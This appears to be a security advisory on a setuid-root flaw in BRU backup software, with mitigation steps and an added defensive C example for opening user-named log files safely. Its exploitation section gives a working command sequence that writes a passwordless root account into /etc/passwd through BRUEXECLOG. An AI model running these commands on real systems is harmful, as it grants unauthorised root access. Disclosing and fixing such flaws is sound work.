COMMAND

    bru

SYSTEMS AFFECTED

    Those using bru

PROBLEM

    Riley Hassell found a vulnerability in BRU during his 'Security
    Contest' for his company.  BRU is backup software.

    You can change the log file BRU uses by setting the BRUEXECLOG
    environment variable.  Since bru is setuid root, the log is
    written with root privileges, so any local user can append to any
    file on the system.

    Exploitation:

        $ BRUEXECLOG=/etc/passwd
        $ export BRUEXECLOG
        $ bru -V '
        > comsec::0:0::/:/bin/sh
        > '
        $ su comsec
        #

SOLUTION

    By default, BRU is installed setuid root.  If it isn't, and is
    run by a non-root user, it complains:

        bru: [W171] warning - BRU must be owned by root and have suid bit set

    Many (most) users who install BRU probably never think to check
    whether it's installed setuid.  Should it be?  Probably not, but
    it is a very real vulnerability under a default install.

    Solution for Caldera OpenLinux:

        - If you do not need BRU, issue as root: rpm -e BRU
        - Otherwise remove the suid-root bit by issuing as root: chmod u-s /bru/bru /bin/bru
        - If you want to use BRU as a normal user, you have to point
          the 'BRUEXECLOG' environment variable to a file writeable by
          the user, like
          bash/sh:
            BRUEXECLOG=~/.brulog
            export BRUEXECLOG

          tcsh/csh:
            setenv BRUEXECLOG ~/.brulog
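
    The root cause described under PROBLEM is a setuid-root program
    opening a path taken from the environment with root's privileges.
    The C code below is an added example, not BRU's code and not part
    of the original advisory: it shows a setuid program opening a
    user-named log file with the invoking user's own privileges.  The
    names open_user_log and EXAMPLE_LOG are hypothetical.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE             /* O_NOFOLLOW, O_CLOEXEC, seteuid, dprintf */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log file named by the invoking user (e.g. through an environment
 * variable) with that user's own privileges, so a setuid-root program cannot
 * be made to append to a file the user could not write to directly.
 * Returns a file descriptor, or -1 if the path is refused or cannot be opened. */
int open_user_log(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    struct stat st;
    int fd;

    if (path == NULL || path[0] == '\0')
        return -1;
    /* Temporarily drop to the real IDs: group first, then user. */
    if (setegid(rgid) != 0 || seteuid(ruid) != 0)
        return -1;
    /* O_NOFOLLOW refuses a symlink as the final component; new files get 0600. */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC | O_NONBLOCK, 0600);
    /* Accept regular files only (no devices or FIFOs). */
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) {
        close(fd);
        fd = -1;
    }
    /* Restore the effective IDs; abort rather than continue in an unknown state. */
    if (seteuid(euid) != 0 || setegid(egid) != 0)
        abort();
    return fd;
}

int main(void)
{
    /* EXAMPLE_LOG is a hypothetical variable name used for this demo. */
    const char *path = getenv("EXAMPLE_LOG");
    int fd = open_user_log(path ? path : "example.log");
    if (fd < 0) {
        fprintf(stderr, "refusing to open log file\n");
        return 1;
    }
    dprintf(fd, "demo entry\n");
    close(fd);
    return 0;
}
```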